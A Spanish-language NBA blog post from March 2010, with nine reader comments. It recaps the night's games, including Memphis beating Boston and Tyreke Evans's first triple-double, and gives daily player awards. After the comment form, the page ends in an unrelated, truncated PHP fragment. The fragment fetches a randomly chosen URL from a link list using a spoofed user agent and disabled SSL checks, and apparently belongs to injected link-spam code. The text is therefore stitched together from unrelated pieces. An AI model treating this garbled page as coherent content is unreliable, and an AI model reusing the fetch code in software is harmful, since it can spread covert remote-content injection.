La Crónica (10/11/2010)

11 de March de 2010 por TheDeerHunter

Impotencia en Boston. Desde el año 2006, con Pau aún en las filas de Memphis, que los Grizzlies no sacaban nada positivo del TD Garden de Boston. Rudy Gay cuajó uno de sus mejores partidos del año haciendo polvo la defensa de los Celtics y es que desde el primer momento se vió que los locales lo iban a pasar muy mal. En uno de los peores partidos de la carrera de Garnett y con Kedrick Perkins en un estado de forma muy preocupante, los hombres grandes de los Grizzlies impusieron su ley. Hasta Thabeet jugó buenos minutos, coincidiendo con los mayores momentos de crisis verde. Se podría pensar que el juego interior de los ex-campeones ahora mismo no tiene nivel de playoffs.

A partir de ahí la jornada transcurrió tranquila con pocos partidos realmente disputados. Quizás pudiéramos calificar de sorpresa el tropezón de los Raptors en Sacramento si no fuera por la tendencia a la dispersión que tiene el equipo canadiense. La noticia fue más bien el primer triple doble en la carrera NBA de Tyreke Evans. La defensa de los Raptors, otra vez más, bastante mejorable. Mucho de eso es cuestión de actitud/mentalidad y la prueba es lo distinto que fue, en ese sentido, el partido contra Lakers. Característica propia de equipo pequeño, lamentablemente.

En el resto de partidos: palizón de los Bobcats a los Sixers, de la mano de la dupla Wallace-Stephen Jackson y que les sirve para reconquistar plaza de PO, en detrimento de los Bulls; con algunos problemas de más despacharon los Jazz a los Pistons que, al menos dieron la cara y no como otros días; Wade en modo MVP hizo inútil el increíble partido de Rasual Butler para los Clippers; los Nuggets lo pasaron mal contra los Wolves, al estar muy desacertados todo el partido desde la línea de triple; los Thunder se aprovecharon de un partido discreto de los rookies de los Hornets y, para terminar, los Mavs y los Spurs cumplieron sus trámites contra Nets y Knicks respectivamente.

PREMIOS

MVP: Creo que es el primer día que Tyreke Evans asalta el título de MVP de los grandes. Anoche consiguió el primer triple doble de su carrera (y vaticino que no será el último) con 19 puntos, 10 rebotes, 10 asistencias y victoria frente los Raptors. Ya estamos ante una auténtica estrella. Aparte del de Sacramento hay que destacar los 28 puntos y 8 rebotes de Rudy Gay que se erigió en el líder de los Grizzlies en su importantísima victoria frente los Celtics, a Manu Ginobili que encadenó su segundo gran partido consecutivo con 28 puntos, 6 rebotes y 5 asistencias y a Dwyane Wade que sigue en mode MVP ventilándose a los Clippers con 27 puntos, 6 rebotes y 8 asistencias.

Rookie: Jrue Holiday sigue conviertiéndose en la buena noticia de los Sixers este año. 13 puntos, 4 rebotes y 8 asistencias para él. Hay jugador. También parece haber jugador en Sergei Ibaka (12-9) que poco a poco se está consolidando en esa gran equipo que son los Thunder. Terrence Williams (18-13-3), Rodrigue Beabouis (16 puntos) y Hasheem Thabbet (7 puntos, 6 rebotes y 1 tapón) también estuvieron entre los destacados.

Sorpresa: 9 puntos (4-6 en tiro) y 4 asistencias en 14 minutos para Sergio Rodríguez. La sorpresa es que se pasara sentado todo el segundo y el último cuarto de la derrota de su equipo frente los Spurs y en su lugar saliera un Toney Douglas que estuvo más que discreto. ¿A qué jugamos Mike?

Decepción: Flojo, flojísimo partido de Chris Bosh. Ante los Kings se quedó con 14 puntos (6 de 20) y 5 rebotes y su equipo perdió uno de esos partidos que no se pueden permitir. Queda mucha temporada como para pensar que lo tienen todo hecho. Los partidos de Kevin Garnett (6-7) y Kendrick Perkins (4-6) también fueron de aúpa.

Esfuerzo en vano: Manda narices que en un equipo con Baron Davis, Chris Kaman o Eric Gordon, el jugador más destacado (y no es el primer día) sea Rasual Butler. 31 puntos inservibles en el partido frente los Heat. Por su parte, David West sigue marcando el ritmo en los Hornets durante la baja de Chris Paul aunque los Playoffs parecen esfumarse definitivamente.

Comenta

9 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Pregunta: “Es D’Antoni el entrenador ideal de un hipotético equipo de grandes agentes libres este verano?”.
    Yo, no lo tengo tan claro.

      Citar

  2. Love Denise dice:
    #2

    no se si d’antoni es el ideal o no, pero el que creo que no es, es el run and gun, este sistema es muy vistoso pero poco efectivo en una temporada a 100 partidos, y más si no cuentas con los jugadores adecuados.
    Veo muy tocado a Boston, a lo mejor es que se están reservando para PO, pero ofrece muchisimas dudas, otra victoria mas de los Mavs, aunque esta ante Nets no tiene mucha importancia.

    pd: Enhorabuena al Pachá que a partir de ahora contará con sus clientes más ilustres entre semana

      Citar

  3. Love Denise dice:
    #3

    upps PERDON. no habia visto el toque de atención que me dio txusma ayer, eliminad la post data si quereis, lo siento, sinceramente.

      Citar

  4. pcerezo dice:
    #4

    JJJ Muy bueno Love Denise…La Toería de la Almohadilla de Daimiel es espectacular…y el comentario en su twitter puro sarcasmo: “La décima es una composción lírica” (Daimiel dixit)…

    Un saludo y arriba esos ánimos…

      Citar

  5. Rompe dice:
    #5

    Impresionante hornada de rookies (quién dijo que era mala?). De momento ya llevan triples dobles Curry, Collison y Evans… alguno más se apunta?

      Citar

  6. Txusma dice:
    #6

    Todos dijeron que era mala y nosotros les hicimos caso… No creo que nadie esperara semejante rendimiento de los Evans, Jennings, Collison, Gibson, Curry, Blair, etc… y es que además hay bastante gente que no lo está haciendo nada mal (Thorton, Harden, Flynn, Holiday, Jebreko, etc…) Y todo esto teniendo en cuenta que Griffin y Rubio ni siquiera han debutado!

      Citar

  7. Dantley2 dice:
    #7

    Yo dije que era mala y si volviera atrás lo diría otra vez. Tenía toda la pinta de un casi superestrella (que veremos si es así) con Griffin, un posible aunque no probable cercano a superestrella tipo Bosh en Tyreke, un par de colosales busts, como Thabeet o Jordan Hill, que tienen pinta de serlos, o Jennings, que me ha tapado la boca, y una hornada de decentes bases, Curry (del que esperaba muchísimo espectáculo, pero ni mucho menos tanta efectividad), Flynn, Lawson.

    Pues casi todo se ha ido un escalón o varios por arriba. De momento decepciona alguno del que esperaba más como Harden, pero se compensa muchísimo con Collison, Jerebko, Gibson …

      Citar

  8. kantonyo dice:
    #8

    Yo todavía espero algo de Thabeet, Austin Daye y de BJ Mullens. Sabia que estaban muy verdes, aunque esperaba que les dieran más minutos. Si aguantan este año en la sombra y lo aprovechan para pulir ciertas carencias, pueden ser buenos jugadores para los próximos años.

    Por cierto deberian crear un premio llamado “Kobe Bryant”, al jugador que triunfa después de un año de rookie sin destacar. Jugadores como David Lee, Zach Randolph, Gerald Wallace, Steve Nash, David West, Al Jefferson, Monta Ellis o Bynum y en menor medida Nowitzki, Granger o Kaman estan en el mismo caso.

      Citar

  9. Dantley2 dice:
    #9

    O incluso el premio Jermaine O’Neal que tardó 6 años ¡¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>